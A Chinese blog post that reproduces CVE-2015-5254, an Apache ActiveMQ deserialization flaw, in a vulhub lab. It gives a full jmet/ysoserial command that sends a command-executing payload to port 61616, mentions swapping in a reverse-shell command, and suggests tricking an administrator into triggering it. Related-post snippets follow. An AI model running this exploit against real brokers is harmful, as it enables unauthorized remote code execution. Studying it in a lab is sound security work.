(CVE-2015-5254)ActiveMQ 反序列化漏洞 0day 漏洞复现

最新推荐文章于 2024-04-30 00:10:35 发布
最新推荐文章于 2024-04-30 00:10:35 发布
阅读量73 收藏
点赞数
文章标签: activemq
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21531681/article/details/135233504
版权

(CVE-2015-5254)ActiveMQ 反序列化漏洞

一、漏洞简介

Apache ActiveMQ
5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java
Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

二、漏洞影响

Apache ActiveMQ 5.13.0之前的5.x版本

三、复现过程

漏洞利用过程如下:

  1. 构造(可以使用ysoserial)可执行命令的序列化对象

  2. 作为一个消息,发送给目标61616端口

  3. 访问web管理页面,读取消息,触发漏洞

使用jmet进行漏洞利用。首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

执行:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

请添加图片描述

此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过http://your-ip:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:

请添加图片描述

点击查看这条消息即可触发命令执行,此时进入容器docker-compose exec activemq bash,可见/tmp/success已成功创建,说明漏洞利用成功:
请添加图片描述

将命令替换成弹shell语句再利用:

请添加图片描述

值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。

参考链接

https://vulhub.org/#/environments/activemq/CVE-2015-5254/

不走小道
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
漏洞复现ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 617
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
漏洞复现】---- ActiveMQ 反序列化漏洞CVE-2015-5254
qq_43168364的博客
09-04 697
一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 漏洞影响的版本为:Apache ActiveMQ 5.13.0之前的版本。 二、漏洞环境准备 pull下来内容 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2910
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
vulhub-activemq-CVE-2015-5254
weixin_43585088的博客
04-17 537
vulhub-activemq-CVE-2015-5254 ActiveMQ Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件 默认端口:8161 vulhub起容器 搭建的时候出了点问题,查了一下可能是net模式的dns有问题,sudo vim /etc/resolv.conf 去添加一些nameserver ERROR: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.i
ActiveMQ--CVE-2015-5254
weixin_37639863的博客
02-17 928
ActiveMQ反序列化漏洞CVE-2015-5254复现 - 渗透测试中心 - 博客园0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache Ahttps://www.cnblogs.com/backlion/p/9970516.htmlActiveMQ 反序列化漏洞复现CVE-2015-5254)_浮生一世暖流年的博客-CSDN博客环境搭建使用vulhub搭
01 - vulhub - ActiveMq - CVE-2015-5254
易编橙 · 终身成长社群,相遇已是上上签!
09-18 633
漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行恶意的代码。
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
最新发布
m0_74402888的博客
04-30 1333
1.在IDEA中建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端口是工作端口,消息在这个端口上传递;
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
ActiveMQ反序列化漏洞CVE-2015-5254
chaojixiaojingang
01-22 493
1.漏洞描述 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2.影响版本 Apache ActiveMQ 5.13.0之前5.x版本 3.漏洞环境搭建 靶机:安装daocker环境centos7: 192.168....
ActiveMQ 反序列化漏洞CVE-2015-5254
黑白的博客
12-21 1318
声明 好好学习,天天向上 漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 CVE-2017-7504漏洞CVE-2015-7501的漏洞如出一辙,只是利用的路径稍微出现了变化,CVE-201
ActiveMQ 反序列化漏洞(CVE-2015-5254)
晚风不及你
03-15 257
漏洞编号 CVE-2015-5254 漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 漏洞影响 Apache ActiveMQ 5.x ~ 5.13.0 漏洞利用 1.vulhub使用dock
Apache ActiveMQ序列化漏洞复现(CVE-2015-5254)
DaWan
09-19 206
这里写自定义目录标题1.环境搭建1.1 下载vulhub1.1 启动环境2.漏洞复现2.1 下载EXP2.2 执行命令 1.环境搭建 1.1 下载vulhub wget https://github.com/vulhub/vulhub 1.1 启动环境 cd /vulhub/activemq/CVE-2015-5254 docker-compose up -d 查看本机IP地址: 截止到此处,环境搭建完成。 2.漏洞复现 2.1 下载EXP 下载地址:https://gi
ActiveMQ 反序列化漏洞复现CVE-2015-5254
浮生一世暖流年的博客
12-18 271
环境搭建 使用vulhub搭建环境,docker-compose up -d 环境搭建以后,开始监听8161和61616两个端口,其中8161是web管理端的端口,61616是工作端口。 复现过程 构造(可以使用ysoserial)可执行命令的序列化对象 作为一个消息,发送给目标61616端口 访问web管理页面,读取消息,触发漏洞 生成序列化对象 使用jmt生成,在同目录下创建一个external文件夹,不然可能报文件不存在错误。 java -jar jmet-0.1.0-all.jar
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
oiadkt的博客
04-14 533
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
CVE-2020-9484:Tomcat Session 反序列化漏洞复现分析
"CVE-2020-9484是一个关于Apache Tomcat Web服务器的漏洞,主要涉及Session反序列化和本地文件包含(LFI)问题,可能导致远程代码执行(RCE)。此漏洞影响多个Tomcat版本,包括10.0.0-M1至10.0.0-M4,9.0.0.M1至9.0....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不走小道

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值